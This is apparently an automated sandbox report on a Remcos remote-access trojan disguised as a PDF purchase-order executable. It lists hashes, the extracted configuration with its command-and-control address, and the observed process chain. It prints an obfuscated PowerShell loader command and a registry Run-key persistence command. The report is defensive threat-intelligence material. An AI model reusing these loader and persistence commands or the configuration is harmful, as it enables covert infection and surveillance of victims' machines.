Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
29/08/2024, 10:01
Static task
static1
Behavioral task
behavioral1
Sample
P.O_Qouts_t87E90Y-E4R7G-PDF.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
P.O_Qouts_t87E90Y-E4R7G-PDF.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240802-en
General
-
Target
P.O_Qouts_t87E90Y-E4R7G-PDF.exe
-
Size
636KB
-
MD5
c1c571c4f8f69d3c8aa0ec091173bd5e
-
SHA1
a36ac174f8ee2ed2254f69a21799837af58071f2
-
SHA256
d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb
-
SHA512
08b540ab5ebb986cc43add736aee38d11a5f0da5252384bb30c7ca7f7b464e63debab4cec5a3dd122e3280f26e57e5ac8adc171e237a681d0e95239bddc11a1d
-
SSDEEP
12288:5rRo7TKXllTfhmiKdHEHPSXbOp/NoJnYRlXO3iBM4ILaa+Brt:JC7TKXlFfsiMEHPSq8YfMiBMh+ht
Malware Config
Extracted
remcos
RemoteHost
45.95.169.18:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-HP1D61
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Loads dropped DLL 1 IoCs
pid Process 2024 P.O_Qouts_t87E90Y-E4R7G-PDF.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\\Reattach237\\').Kkkenredskab;%Risikofriestes% ($Follikler)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2776 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2060 powershell.exe 2776 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2060 set thread context of 2776 2060 powershell.exe 34 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Detrainment90\strenuosity.pot P.O_Qouts_t87E90Y-E4R7G-PDF.exe -
pid Process 2060 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P.O_Qouts_t87E90Y-E4R7G-PDF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1488 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2060 powershell.exe 2060 powershell.exe 2060 powershell.exe 2060 powershell.exe 2060 powershell.exe 2060 powershell.exe 2060 powershell.exe 2060 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2060 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2024 wrote to memory of 2060 2024 P.O_Qouts_t87E90Y-E4R7G-PDF.exe 31 PID 2024 wrote to memory of 2060 2024 P.O_Qouts_t87E90Y-E4R7G-PDF.exe 31 PID 2024 wrote to memory of 2060 2024 P.O_Qouts_t87E90Y-E4R7G-PDF.exe 31 PID 2024 wrote to memory of 2060 2024 P.O_Qouts_t87E90Y-E4R7G-PDF.exe 31 PID 2060 wrote to memory of 2776 2060 powershell.exe 34 PID 2060 wrote to memory of 2776 2060 powershell.exe 34 PID 2060 wrote to memory of 2776 2060 powershell.exe 34 PID 2060 wrote to memory of 2776 2060 powershell.exe 34 PID 2060 wrote to memory of 2776 2060 powershell.exe 34 PID 2060 wrote to memory of 2776 2060 powershell.exe 34 PID 2776 wrote to memory of 2620 2776 wab.exe 35 PID 2776 wrote to memory of 2620 2776 wab.exe 35 PID 2776 wrote to memory of 2620 2776 wab.exe 35 PID 2776 wrote to memory of 2620 2776 wab.exe 35 PID 2620 wrote to memory of 1488 2620 cmd.exe 37 PID 2620 wrote to memory of 1488 2620 cmd.exe 37 PID 2620 wrote to memory of 1488 2620 cmd.exe 37 PID 2620 wrote to memory of 1488 2620 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"C:\Users\Admin\AppData\Local\Temp\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\Admin\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1488
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
364KB
MD54f7bc22100b0ce9f5392bb0b43ab22c9
SHA1322f410d7c94a5f400656e1c49b5d4cef6dde8f2
SHA25667e85d9212594f2e8be65a3a6a3c8625ca5efe8070050c390e918bcd1da16f3a
SHA512dfc1ba12d84c489d6f6417c1c2f775ba107076b48f2f57b0a565070a88f91334187734463f895b17de46acb620347a1fc36c1deef55969942cf4663de48a347b
-
Filesize
54KB
MD54bb55c98fcfab7c0706cf43af638c89e
SHA158f5ec920e25fa95c47a826e34736d1159232efd
SHA256fafe02f6852b01802bbfe61fe7bb3de41e3d32dfd7b7054e8da7774cecbb3d8d
SHA512591fb17f2d78e25ef91eeb48d8fee5d09de00e553fa0710c28c84f3f1bc657cc8b4d2a4f6e982e4409d8e3450f60d13e6dbce473d33b3fab3d0eed3b489e5e27
-
Filesize
9KB
MD5eb2c74e05b30b29887b3219f4ea3fdab
SHA191173d46b34e7bae57acabdbd239111b5bcc4d9e
SHA256d253ca5aba34b925796777893f114cc741b015af7868022ab1db2341288c55ed
SHA5121bb035260223ec585170f891c2624b9ae98671f225e74b913b40bb77b66e3b9c2016037bc8e4b0ae16367d82590a60a0a3bd95d05139ea2454f02020d1b54dae